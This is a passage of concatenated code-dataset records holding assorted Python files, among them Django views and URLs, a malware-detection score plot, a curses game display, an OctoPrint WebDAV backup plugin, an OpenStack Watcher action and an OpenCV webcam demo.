)\n)","sub_path":"moonshot/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"38689734","text":"from django.http import HttpResponseForbidden\nfrom django.shortcuts import render, render_to_response,HttpResponse\nfrom .models import Message, Dialog\nfrom django.views import View\nfrom django.db.models import Q\nfrom notifications.models import Notification\n\n\ndef get_my_dialogs(request):\n\n return render_to_response('views/dialogs.html', {\n 'dialogs': Dialog.objects.filter(Q(owner=request.user) | Q(opponent=request.user))\n })\n\n\ndef create_dialog(request, opponent):\n user = request.user\n if not Dialog.objects.filter(Q(owner=user, opponent_id=opponent) | Q(owner_id=opponent, opponent=user)):\n Dialog.objects.create(owner=request.user, opponent_id=opponent)\n return render_to_response('views/dialogs.html', {\n 'dialogs': Dialog.objects.filter(Q(owner=request.user) | Q(opponent=request.user))\n })\n\n\nclass MessengerView(View):\n\n def get(self, request, dialog_id):\n dialog = Dialog.objects.get(id=dialog_id)\n if request.user == dialog.owner:\n unread_messages = Message.objects.filter(sender=dialog.opponent, read=False)\n else:\n unread_messages = Message.objects.filter(sender=dialog.owner, read=False)\n\n for unread_message in unread_messages:\n notification = Notification.objects.filter(recipient=request.user, actor_object_id=unread_message.id)\n for notif in notification:\n notif.delete()\n unread_message.read = True\n unread_message.save()\n\n return render_to_response('views/for_messanger.html', {\n 'dialog_id': dialog_id,\n 'messages': Message.objects.filter(dialog_id=dialog_id).order_by('id'),\n 'user': request.user,\n })\n\n def post(self, request):\n # msg = Message(dialog_id=request.POST['dialog_id'], sender=request.user, text=request.POST['message'])\n # msg.save()\n # return render_to_response('views/for_messanger.html', {\n # 'dialog_id': request.POST['dialog_id'],\n # 'messages': Message.objects.filter(dialog_id=request.POST['dialog_id']),\n # 'user': request.user,\n # })\n return HttpResponse('ds')","sub_path":"dialogs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"80344139","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Sep 13 15:01:43 2017\n\n@author: N1705165D\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nalpha = [0.1, 0.05, 0.02, 0.01, 0.0001]\n\ndef line_plot(benign_data, malware_data):\n ax = plt.subplot(111)\n for num in range(len(alpha)):\n ax.plot(benign_data[num], label = \"Benign with Confidence %s%%\" % ((1 - alpha[num]) * 100))\n ax.plot(malware_data[num], label = \"Malware with Confidence %s%%\" % ((1 - alpha[num]) * 100))\n plt.xlabel(\"Program Under Test\")\n plt.ylabel(\"Score (lambda)\")\n box = ax.get_position()\n ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n# plt.show()\n plt.title(\"Variation of Score for Program Under Test \\n for different Confidence Level\")\n plt.tight_layout()\n plt.savefig(\"significance.png\", bbox_inches='tight')\n \ndef plot():\n benign_data = []\n malware_data = []\n for a in alpha:\n data = pd.read_csv(str(a)+\"_score.txt\", header=None).as_matrix()[:,0]\n benign_data.append(data[0:10])\n malware_data.append(data[10:20])\n line_plot(benign_data, malware_data)\n 
\n    for i in range(len(alpha)):\n        data1 = benign_data[i]\n        data2 = malware_data[i]\n        diff = 0\n        for i in range(len(data2)):\n            for j in range(len(data1)):\n                diff = diff + (data2[i] - data1[j])\n        print(diff/(len(data1)*len(data2)))\n\ndef line_plot_hotelling(benign_data, malware_data):\n    ax = plt.subplot(111)\n    ax.plot(benign_data[0], label = \"Benign for Welch's t-test\")\n    ax.plot(malware_data[0], label = \"Malware for Welch's t-test\")\n    ax.plot(benign_data[1], label = \"Benign for Hotelling's t-test\")\n    ax.plot(malware_data[1], label = \"Malware for Hotelling's t-test\")\n    plt.xlabel(\"Program Under Test\")\n    plt.ylabel(\"Score (lambda)\")\n    box = ax.get_position()\n    ax.set_position([box.x0, box.y0, box.width * 0.8, box.height])\n    ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n    plt.show()\n\ndef plot_hotelling():\n    benign_data = []\n    malware_data = []\n    data1 = pd.read_csv(str(alpha)+\"_score.txt\", header=None).as_matrix()[:,0]\n    data2 = pd.read_csv(\"../multivariate_detection_equal_variance/score.txt\", header=None).as_matrix()[:,0]\n    benign_data.append(data1[0:10])\n    malware_data.append(data1[10:20])\n    benign_data.append(data2[0:10])\n    malware_data.append(data2[10:20])\n    line_plot_hotelling(benign_data, malware_data)\n    for i in range(2):\n        data1 = benign_data[i]\n        data2 = malware_data[i]\n        diff = 0\n        for i in range(len(data2)):\n            for j in range(len(data1)):\n                diff = diff + (data2[i] - data1[j])\n        print(diff/(len(data1)*len(data2)))\n\nplot()","sub_path":"t_test_detection/univariate_detection/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"604269252","text":"import sys\r\nimport json\r\n\r\njsonFile = open(\"questions.json\", \"w+\")\r\nquestionsFile = open(\"questions.txt\", \"r+\").read()\r\nanswersFile = open(\"answers.txt\", \"r+\").read()\r\n\r\nquestions = [question for question in questionsFile.split('\\n') if question]\r\nanswers = [answer for answer in answersFile.split('\\n') if answer]\r\nquestLen = [len(questions) if len(questions) == len(answers) else print('The number of questions does not match the number of answers')] \r\n# questLen holds [None] when the counts differ, so test the element, not the (always truthy) list\r\n[None if questLen[0] is not None else sys.exit()]\r\n\r\nmyobj = {\r\n\t\"questArray\" : []\r\n}\r\n\r\nfor combo in range(questLen[0]):\r\n\tmyobj[\"questArray\"].append({\r\n\t\t\t\"question\": questions[combo],\r\n\t\t\t\"answer\": answers[combo]\r\n\t\t})\r\n\r\njson.dump(myobj, jsonFile)\r\njsonFile.close()","sub_path":"questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"307515103","text":"from django.urls import path\nfrom django.conf.urls import url, include\nfrom rest_framework import routers\nfrom rest_framework_nested import routers\nfrom . import views\n\nrouter = routers.DefaultRouter()\nrouter.register(r'users', views.UserViewSet, base_name='users')\nrouter.register(r'profile', views.UserProfileViewSet, base_name='profile')\nrouter.register(r'public_profile', views.UserPublicProfileViewSet, base_name='public_profile')\nrouter.register(r'ROOT', views.GroupRootViewSet, base_name='grouproot')\nrouter.register(r'groups', views.GroupViewSet, base_name='group') # lookup= 'groups'\n\ngroup_router = routers.NestedSimpleRouter(router, r'groups') # lookup= 'children'\ngroup_router.register(r'children', views.ChildrenViewSet, base_name='children')\n\ngroupchat_router = routers.NestedSimpleRouter(router, r'groups') # lookup= 'groupchat'\ngroupchat_router.register(r'chat', views.GroupChatViewSet, base_name='chat')\n\nmessages_router = routers.NestedSimpleRouter(groupchat_router, r'chat')\nmessages_router.register(r'messages', views.GroupChatMessageViewSet, base_name='messages')\n\n\nurlpatterns = [\n    url(r'^', include(router.urls)),\n    url(r'^', include(group_router.urls)),\n    url(r'^', include(groupchat_router.urls)),\n]\n","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"582645088","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @software: PyCharm\n# @time: 2019/8/26 13:44\n# @author: Paulson●Wier\n# @file: selectionSort.py\n# @desc:\n\n\ndef select_sort(arr):\n    for i in range(len(arr)-1):\n        # record the index of the current minimum\n        min_index = i\n        for j in range(i+1, len(arr)):\n            if arr[j] < arr[min_index]:\n                min_index = j\n        # when position i does not hold the minimum, swap it with the minimum\n        if i != min_index:\n            arr[i], arr[min_index] = arr[min_index], arr[i]\n        print(arr)\n    return arr\n\n\nif __name__ == '__main__':\n    arr = [1, 0, 32, 12, 5, 76, 7]\n    print(select_sort(arr=arr))\n\n\n\n\n","sub_path":"selectionSort.py","file_name":"selectionSort.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"101166908","text":"import curses\nimport guesivian.coordinate as coord\nimport guesivian.color as color\n\n\nclass Room(object):\n    \"\"\" Widget for main game screen \"\"\"\n\n    def __init__(self, width=60, height=30, entities=None, lookat=None):\n        \"\"\" Creates a new room, defaulting to size (60, 30) \"\"\"\n        self.width = width\n        self.height = height\n        self.entities = coord.QuadTree(coord.Rectangle(0, 0, width, height))\n        if entities is not None:\n            for x in entities:\n                self.entities.insert(x)\n        self.lookat = lookat or coord.Point(0, 0)\n\n    def display(self, screensize):\n        \"\"\"\n        Changes the state of the pad to the new game state.\n        Does not actually update the screen.\n        \"\"\"\n        self.pad.clear()\n        tlx, tly = screensize.top_left()\n        brx, bry = screensize.bottom_right()\n        rect = coord.Rectangle(tlx, tly, self.width, self.height)\n        self.bounds = rect\n        col = filter(lambda e: e.visible, self.entities.inarea(rect))\n        palette = color.default()\n        for entity in col:\n            self.pad.move(entity.position.y(), entity.position.x())\n            if entity.position + coord.Point(1, 1) == rect.bottom_right():\n                paint = self.pad.insstr\n            else:\n                paint = self.pad.addstr\n            paint(entity.face, curses.color_pair(palette[entity.color_code]))\n        self.pad.noutrefresh(self.lookat.y(), self.lookat.x(), tly, tlx,\n                             bry, brx)\n\n    def create_pad(self):\n        \"\"\" Creates a pad in the screen for this room \"\"\"\n        self.pad = curses.newpad(self.height, self.width)\n\n    def focus(self, focalpoint, screensize):\n        \"\"\"\n        Focus the screen on a specific point.\n        To be used when the logical room is bigger than the display.\n        The focal point is usually the hero location.\n        \"\"\"\n        width, height = screensize.size()\n        fx, fy = focalpoint\n        lookatx = fx - (width / 2)\n        lookaty = fy - (height / 2)\n        self.lookat = coord.Point(lookatx, lookaty)\n\n    def entities_at(self, position):\n        \"\"\" Looks for an entity in a given position \"\"\"\n        # Note this will most likely be changed to a tree or similar\n        # instead of linear searching later on.\n        return (e for e in self.entities if e.position == position)\n\n    def fill_border(self, creator):\n        \"\"\" Fills the border with entities created by ``creator`` \"\"\"\n        for pt in coord.Rectangle(w=self.width, h=self.height).borders():\n            e = creator()\n            e.position = pt\n            self.entities.insert(e)\n\n\nclass Display(object):\n    \"\"\" Manages all the other display widgets \"\"\"\n\n    def __init__(self, width=80, height=40):\n        \"\"\" Initializes the display manager, defaults to size (80, 40) \"\"\"\n        self.width = width\n        self.height = height\n        self.currentroom = None\n        self.widgets = []\n        self.scr = curses.initscr()\n        self._initcurses()\n\n    def _initcurses(self):\n        curses.start_color()\n        color.init_default()\n        curses.noecho()\n        curses.curs_set(False)\n        self.scr.keypad(True)\n\n    def cleanup(self):\n        \"\"\" Cleanup the terminal to default state \"\"\"\n        curses.nocbreak()\n        self.scr.keypad(False)\n        curses.echo()\n        curses.endwin()\n\n    def display(self):\n        \"\"\" Displays every widget on the screen \"\"\"\n        screen = coord.Rectangle(0, 0, self.width, self.height)\n        for widget in self.widgets:\n            widget.display(screen)\n        curses.doupdate()\n\n    def set_room(self, room):\n        \"\"\" Sets the current room \"\"\"\n        if self.currentroom is not None and self.currentroom in self.widgets:\n            self.widgets.remove(self.currentroom)\n        self.currentroom = room\n        self.widgets.append(room)\n\n    def readkey(self):\n        \"\"\" Reads a key from stdin as a string \"\"\"\n        return self.scr.getkey()\n\n\nclass Log(object):\n    \"\"\" Displays a history log with messages to the player \"\"\"\n\n    def __init__(self, count=None, history=100):\n        \"\"\"\n        Instantiates a log widget for ``count`` messages in ``position``\n        (relative to Display-parent). Stores up to ``history`` messages\n        available for navigation (if ``history``>``count``, that is).\n        If ``count`` is not supplied, the height of the window's area will\n        be used instead. 
Messages won't be retrievable until ``count`` is set.\n \"\"\"\n self.entries = []\n self.count = count\n self.history = history\n\n def log(self, msg):\n \"\"\" Logs a new message \"\"\"\n self.entries.append(msg)\n if len(self.entries) > self.history:\n self.entries = self.entries[1:]\n\n def messages(self):\n \"\"\" Returns the last ``count`` messages \"\"\"\n return self.entries[-self.count:]\n\n def create_window(self, area):\n \"\"\"\n Creates the curses window for the log widget.\n If ``count`` is not set or is higher than the height, the height\n will be used as the count.\n \"\"\"\n width, height = area.size()\n ax, ay = area.top_left()\n self.window = curses.newwin(height, width, ay, ax)\n if self.count is None:\n self.count = height\n else:\n self.count = min(height, self.count)\n\n def display(self, screensize):\n \"\"\" Displays the last ``count`` messages on screen \"\"\"\n msgs = self.messages()\n self.window.clear()\n for y in range(len(msgs)):\n self.window.insstr(y, 0, msgs[y])\n self.window.noutrefresh()\n","sub_path":"guesivian/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":5616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"546130240","text":"__author__ = 'rolandh'\n\n\nNAME = [\"givenName\", \"displayName\", \"sn\"]\nSTATIC_ORG_INFO = [\"c\", \"o\", \"co\", \"norEduOrgAcronym\", \"schacHomeOrganization\",\n 'schacHomeOrganizationType']\nOTHER = [\"eduPersonPrincipalName\", \"eduPersonScopedAffiliation\", \"mail\"]\n\n# These give you access to information\nRESEARCH_AND_EDUCATION = \"http://www.swamid.se/category/research-and-education\"\nSFS_1993_1153 = \"http://www.swamid.se/category/sfs-1993-1153\"\n\n# presently these don't by themself\nEU = \"http://www.swamid.se/category/eu-adequate-protection\"\nNREN = \"http://www.swamid.se/category/nren-service\"\nHEI = \"http://www.swamid.se/category/hei-service\"\n\nRELEASE = {\n \"\": [\"eduPersonTargetedID\"],\n SFS_1993_1153: [\"norEduPersonNIN\"],\n (RESEARCH_AND_EDUCATION, EU): NAME + STATIC_ORG_INFO + OTHER,\n (RESEARCH_AND_EDUCATION, NREN): NAME + STATIC_ORG_INFO + OTHER,\n (RESEARCH_AND_EDUCATION, HEI): NAME + STATIC_ORG_INFO + OTHER,\n}","sub_path":"desktop/core/ext-py/pysaml2-4.4.0/src/saml2/entity_category/swamid.py","file_name":"swamid.py","file_ext":"py","file_size_in_byte":937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"277748581","text":"# -*- encoding: utf-8 -*-\n# Copyright (c) 2015 b<>com\n#\n# Authors: Jean-Emile DARTOIS \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom watcher._i18n import _\nfrom watcher.applier.actions import base\nfrom watcher.common import exception\nfrom watcher.common import nova_helper\nfrom watcher.decision_engine.model import element\n\n\nclass ChangeNovaServiceState(base.BaseAction):\n \"\"\"Disables or enables the nova-compute service, deployed on a host\n\n By using this action, you will be able to update the state of a\n 
nova-compute service. A disabled nova-compute service can not be selected\n by the nova scheduler for future deployment of server.\n\n The action schema is::\n\n schema = Schema({\n 'resource_id': str,\n 'state': str,\n 'disabled_reason': str,\n })\n\n The `resource_id` references a nova-compute service name (list of available\n nova-compute services is returned by this command: ``nova service-list\n --binary nova-compute``).\n The `state` value should either be `ONLINE` or `OFFLINE`.\n The `disabled_reason` references the reason why Watcher disables this\n nova-compute service. The value should be with `watcher_` prefix, such as\n `watcher_disabled`, `watcher_maintaining`.\n \"\"\"\n\n STATE = 'state'\n REASON = 'disabled_reason'\n RESOURCE_NAME = 'resource_name'\n\n @property\n def schema(self):\n return {\n 'type': 'object',\n 'properties': {\n 'resource_id': {\n 'type': 'string',\n \"minlength\": 1\n },\n 'resource_name': {\n 'type': 'string',\n \"minlength\": 1\n },\n 'state': {\n 'type': 'string',\n 'enum': [element.ServiceState.ONLINE.value,\n element.ServiceState.OFFLINE.value,\n element.ServiceState.ENABLED.value,\n element.ServiceState.DISABLED.value]\n },\n 'disabled_reason': {\n 'type': 'string',\n \"minlength\": 1\n }\n },\n 'required': ['resource_id', 'state'],\n 'additionalProperties': False,\n }\n\n @property\n def host(self):\n return self.input_parameters.get(self.RESOURCE_NAME)\n\n @property\n def state(self):\n return self.input_parameters.get(self.STATE)\n\n @property\n def reason(self):\n return self.input_parameters.get(self.REASON)\n\n def execute(self):\n target_state = None\n if self.state == element.ServiceState.DISABLED.value:\n target_state = False\n elif self.state == element.ServiceState.ENABLED.value:\n target_state = True\n return self._nova_manage_service(target_state)\n\n def revert(self):\n target_state = None\n if self.state == element.ServiceState.DISABLED.value:\n target_state = True\n elif self.state == element.ServiceState.ENABLED.value:\n target_state = False\n return self._nova_manage_service(target_state)\n\n def _nova_manage_service(self, state):\n if state is None:\n raise exception.IllegalArgumentException(\n message=_(\"The target state is not defined\"))\n\n nova = nova_helper.NovaHelper(osc=self.osc)\n if state is True:\n return nova.enable_service_nova_compute(self.host)\n else:\n return nova.disable_service_nova_compute(self.host, self.reason)\n\n def pre_condition(self):\n pass\n\n def post_condition(self):\n pass\n\n def get_description(self):\n \"\"\"Description of the action\"\"\"\n return (\"Disables or enables the nova-compute service.\"\n \"A disabled nova-compute service can not be selected \"\n \"by the nova for future deployment of new server.\")\n","sub_path":"watcher/applier/actions/change_nova_service_state.py","file_name":"change_nova_service_state.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"160727079","text":"# coding=utf-8\nfrom __future__ import absolute_import\n\nfrom os import path as ospath\nimport math\nimport logging\nfrom webdav3.client import Client\nfrom webdav3.exceptions import WebDavException,ResponseErrorCode,RemoteResourceNotFound\nfrom datetime import datetime\nfrom http import HTTPStatus\nimport octoprint.plugin\nfrom octoprint.events import Events, eventManager\nfrom octoprint.server import user_permission\nfrom octoprint.settings import settings\n\nSETTINGS_DEFAULTS = dict(\n server=None,\n 
username=None,\n password=None,\n timeout=30,\n verify_certificate=True,\n upload_path=\"/\",\n check_space=False\n)\n\nclass WebDavBackupPlugin(octoprint.plugin.SettingsPlugin,\n octoprint.plugin.AssetPlugin,\n octoprint.plugin.TemplatePlugin,\n octoprint.plugin.EventHandlerPlugin,\n):\n\n def __init__(self):\n self._logger = logging.getLogger(__name__)\n\n ##~~ SettingsPlugin mixin\n def get_settings_defaults(self):\n return SETTINGS_DEFAULTS\n\n ##~~ EventHandlerPlugin mixin\n def on_event(self, event, payload):\n if event == \"plugin_backup_backup_created\":\n # Helper function for human readable sizes\n def _convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n\n now = datetime.now()\n\n davoptions = {\n 'webdav_hostname': self._settings.get([\"server\"]),\n 'webdav_login': self._settings.get([\"username\"]),\n 'webdav_password': self._settings.get([\"password\"]),\n 'webdav_timeout': self._settings.get([\"timeout\"]),\n }\n\n backup_path = payload[\"path\"]\n backup_name = payload[\"name\"]\n self._logger.info(\"Backup \" + backup_path + \" created, will now attempt to upload to \" + davoptions[\"webdav_hostname\"])\n\n davclient = Client(davoptions)\n davclient.verify = self._settings.get([\"verify_certificate\"])\n check_space = self._settings.get([\"check_space\"])\n upload_path = now.strftime(self._settings.get([\"upload_path\"]))\n upload_path = ospath.join(\"/\", upload_path)\n if self._settings.get([\"upload_name\"]):\n upload_name = now.strftime(self._settings.get([\"upload_name\"])) + ospath.splitext(backup_path)[1]\n self._logger.debug(\"Filename for upload: \" + upload_name)\n else:\n upload_name = backup_name\n upload_file = ospath.join(\"/\", upload_path, upload_name)\n upload_temp = ospath.join(\"/\", upload_path, upload_name + \".tmp\")\n\n # Check actual connection to the WebDAV server as the check command will not do this.\n try:\n # If the resource was not found\n if check_space:\n dav_free = davclient.free()\n if dav_free < 0:\n # If we get a negative free size, this server is not returning correct value.\n check_space = False\n self._logger.warning(\"Free space on server: \" + _convert_size(dav_free) + \", it appears your server does not support reporting size correctly\")\n else:\n self._logger.info(\"Free space on server: \" + _convert_size(dav_free))\n else:\n # Not as proper of a check as retrieving size, but it's something.\n davclient.check(\"/\")\n except RemoteResourceNotFound as exception:\n self._logger.error(\"Resource was not found, something is probably wrong with your settings.\")\n return\n except ResponseErrorCode as exception:\n # Write error and exit function\n status = HTTPStatus(exception.code)\n error_switcher = {\n 400: \"Bad request\",\n 401: \"Unauthorized\",\n 403: \"Forbidden\",\n 404: \"Not found\",\n 405: \"Method not allowed\",\n 408: \"Request timeout\",\n 500: \"Internal error\",\n 501: \"Not implemented\",\n 502: \"Bad gateway\",\n 503: \"Service unavailable\",\n 504: \"Gateway timeout\",\n 508: \"Loop detected\",\n }\n if (exception.code == 401):\n http_error = \"HTTP error 401 encountered, your credentials are most likely wrong.\"\n else:\n http_error = \"HTTP error encountered: \" + str(status.value) + \" \" + error_switcher.get(exception.code, status.phrase)\n 
self._logger.error(http_error)\n                return\n            except WebDavException as exception:\n                # exception.args is a tuple; format the exception as a string before concatenating\n                self._logger.error(\"An unexpected WebDAV error was encountered: \" + str(exception))\n                raise\n\n            backup_size = ospath.getsize(backup_path)\n            self._logger.info(\"Backup file size: \" + _convert_size(backup_size))\n\n            if check_space and backup_size > dav_free:\n                self._logger.error(\"Unable to upload, size is \" + _convert_size(backup_size) + \", free space is \" + _convert_size(dav_free))\n            else:\n                # Helper function to recursively create paths\n                def _recursive_create_path(path):\n                    # Append leading / for preventing abspath issues\n                    path = ospath.join(\"/\", path)\n                    if davclient.check(path):\n                        self._logger.debug(\"Directory \" + path + \" was found.\")\n                        return True\n                    else:\n                        if path != \"/\":\n                            self._logger.debug(\"Directory \" + path + \" was not found, checking parent.\")\n                            if _recursive_create_path(ospath.abspath(ospath.join(path, \"..\"))):\n                                davclient.mkdir(path)\n                                self._logger.debug(\"Directory \" + path + \" has been created.\")\n                                return True\n                        else:\n                            self._logger.error(\"Could not find WebDAV root, something is probably wrong with your settings.\")\n                        return False\n\n                if _recursive_create_path(upload_path):\n                    davclient.upload_sync(remote_path=upload_temp, local_path=backup_path)\n                    davclient.move(remote_path_from=upload_temp, remote_path_to=upload_file)\n                    self._logger.info(\"Backup has been uploaded successfully to \" + davoptions[\"webdav_hostname\"] + \" as \" + upload_file)\n                else:\n                    self._logger.error(\"Something went wrong trying to check/create the upload path.\")\n\n    ##~~ TemplatePlugin mixin\n    def get_template_configs(self):\n        return [\n            dict(\n                type=\"settings\", custom_bindings=False\n            )\n        ]\n\n    ##~~ Softwareupdate hook\n    def get_update_information(self):\n        return dict(\n            webdavbackup=dict(\n                displayName=\"WebDAV Backup\",\n                displayVersion=self._plugin_version,\n\n                type=\"github_release\",\n                user=\"edekeijzer\",\n                repo=\"OctoPrint-WebDavBackup\",\n                current=self._plugin_version,\n\t\t\t\tstable_branch=dict(\n\t\t\t\t\tname=\"Stable\",\n\t\t\t\t\tbranch=\"main\",\n\t\t\t\t\tcomittish=[\"main\"]\n\t\t\t\t),\n\t\t\t\tprerelease_branches=[\n\t\t\t\t\tdict(\n\t\t\t\t\t\tname=\"Release Candidate\",\n\t\t\t\t\t\tbranch=\"rc\",\n\t\t\t\t\t\tcomittish=[\"rc\", \"main\"]\n\t\t\t\t\t)\n\t\t\t\t],\n                pip=\"https://github.com/edekeijzer/OctoPrint-WebDavBackup/archive/{target_version}.zip\"\n            )\n        )\n\n\n__plugin_name__ = \"WebDAV Backup\"\n__plugin_pythoncompat__ = \">=3,<4\"\n\ndef __plugin_load__():\n    global __plugin_implementation__\n    __plugin_implementation__ = WebDavBackupPlugin()\n\n    global __plugin_hooks__\n    __plugin_hooks__ = {\n        \"octoprint.plugin.softwareupdate.check_config\": __plugin_implementation__.get_update_information\n    }\n\n","sub_path":"octoprint_webdavbackup/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"340932586","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('history', '0002_auto_20150914_1558'),\n    ]\n\n    operations = [\n        migrations.AlterModelOptions(\n            name='person',\n            options={'ordering': ['-date_of_birth']},\n        ),\n        migrations.AddField(\n            model_name='event',\n            name='people',\n            field=models.ManyToManyField(related_name='events', to='history.Person', blank=True),\n        ),\n        migrations.AddField(\n            model_name='person',\n            name='date_of_birth_precision',\n            field=models.PositiveSmallIntegerField(default=1, choices=[(1, b'year'), (2, b'month'), (3, b'day')]),\n        ),\n        migrations.AddField(\n            model_name='person',\n            name='date_of_death_precision',\n            field=models.PositiveSmallIntegerField(default=1, choices=[(1, b'year'), (2, b'month'), (3, b'day')]),\n        ),\n    ]\n","sub_path":"history/migrations/0003_auto_20150914_1609.py","file_name":"0003_auto_20150914_1609.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"534368913","text":"import cv2\nimport numpy\n\nx_st = 150\ny_st = 150\nx_sp = x_st + 300\ny_sp = y_st + 200\n\nRECT = ((x_st, y_st), (x_sp, y_sp))\n(left, top), (right, bottom) = RECT\n\ndef roiarea(frame):\n    return frame[top:bottom, left:right]\n    \ndef replaceroi(frame, roi):\n    frame[top:bottom, left:right] = roi\n    return frame\n\ndef image_process(roi):\n    '''\n    print(type(roi))\n    print('shape = ', roi.shape)\n    print('W = ', roi.shape[1])\n    print('H = ', roi.shape[0])\n    '''\n    W = roi.shape[1]\n    H = roi.shape[0]\n    for j in range(H):\n        for i in range(W):\n            b = roi[j][i][0]\n            g = roi[j][i][1]\n            r = roi[j][i][2]\n            a = ((numpy.int16)(b) + (numpy.int16)(g) + (numpy.int16)(r))//3\n            #roi[j][i][0] = roi[j][i][1] = roi[j][i][2] = (numpy.uint8)(a)\n            #roi[j][i][0] = 255 #B\n            #roi[j][i][1] = 255 #G\n            roi[j][i][2] = 255 #R\n    return roi\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n    ret, frame = cap.read()\n    frame = cv2.flip(frame, 1)\n\n    roi1 = roiarea(frame) #extract the sub-image (ROI)\n    #roi2 = cv2.cvtColor(roi1, cv2.COLOR_BGR2HSV) #image processing option 1\n    roi2 = image_process(roi1) #image processing option 2\n    frame = replaceroi(frame, roi2) #paste the ROI back into the original frame\n    cv2.rectangle(frame, RECT[0], RECT[1], (0, 255, 0), 2)#draw a rectangle (BGR), linewidth\n    \n    cv2.imshow('frame', frame)\n    \n    if cv2.waitKey(1) == 27:\n        roi2 = image_process(roi1) #run image processing once more\n        cv2.destroyAllWindows()\n        break\n","sub_path":"_4.python/opencv/opencv13_webcam3_image_processing.py","file_name":"opencv13_webcam3_image_processing.py","file_ext":"py","file_size_in_byte":1499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"551933721","text":"from django.http import HttpResponsePermanentRedirect\n\n#http://djangosnippets.org/snippets/2655/\n\nclass RedirectToNoSlash(object):\n    def process_request(self, request):\n        #added the following as POSTs were failing when redirected\n        if request.method != 'POST':\n            if '/admin' not in request.path and request.path != '/':\n                if '/captcha/' not in request.path:\n                    if '/voucher/' not in request.path:\n                        if request.path[-1] == '/':\n                            return HttpResponsePermanentRedirect(request.path[:-1])\n","sub_path":"hyperlocal/mymiddleware/mymiddleware.py","file_name":"mymiddleware.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"37485204","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nfrom django import forms\r\nimport models\r\nclass electric_form(forms.ModelForm):\r\n\tclass Meta:\r\n\t\tmodel = models.Electric #this relates back to the models.py\r\n\t\tfields = (\r\n\t\t \t\t\t# 'date_created',\r\n\t\t 
